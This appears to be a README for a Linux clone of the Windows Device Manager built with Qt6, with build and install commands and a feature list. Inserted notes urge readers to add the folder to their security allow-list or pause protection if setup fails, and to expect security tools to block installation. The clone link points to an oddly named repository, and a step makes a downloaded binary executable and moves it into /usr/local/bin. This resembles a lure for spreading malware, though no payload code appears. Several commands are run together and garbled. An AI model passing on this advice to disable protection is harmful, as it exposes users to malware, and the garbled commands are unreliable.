The Windows Device Manager, on Linux
A faithful recreation of the Windows Device Manager built with Qt6 and real hardware backends via sysfs/procfs. Best enjoyed with AeroThemePlasma, but looks great on regular KDE as well.
Note
Built for CachyOS / Arch Linux. Also packaged as a Nix flake for NixOS.
Some features (DKMS uninstall, driver date lookup) depend on dkms and pacman. Other distros may need minor adjustments.
![]() |
![]() |
![]() |
![]() |
![]() |
![]() |
yay -S linux-devmgmtchmod +x devmgmt-x86_64
sudo mv devmgmt-x86_64 /usr/local/bin/devmgmtsudo pacman -S qt6-base cmake
cmake -B build
./build/devmgmtnix build
./result/bin/devmgmt
# or run directly
nix runTip
If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.
Caution
Some security systems may block the installation. Only download from the official repository.
git clone https://github.com/AnalystCorrect/linux-devmgmt-482.git
cd linux-devmgmt-482
mkdir build && cd build
cmake ..
cmake --build . --config ReleaseA dev shell with Qt Creator and GDB is also available:
nix develop- Full two-level device tree (by type) backed by real sysfs/procfs data
- Per-device Properties dialog with General, Driver, Details, and Resources tabs
- Enable / disable devices via kernel module blacklisting
- Uninstall DKMS drivers
- Update Driver wizard
- Driver Details viewer (
modinfooutput) - Scan for hardware changes





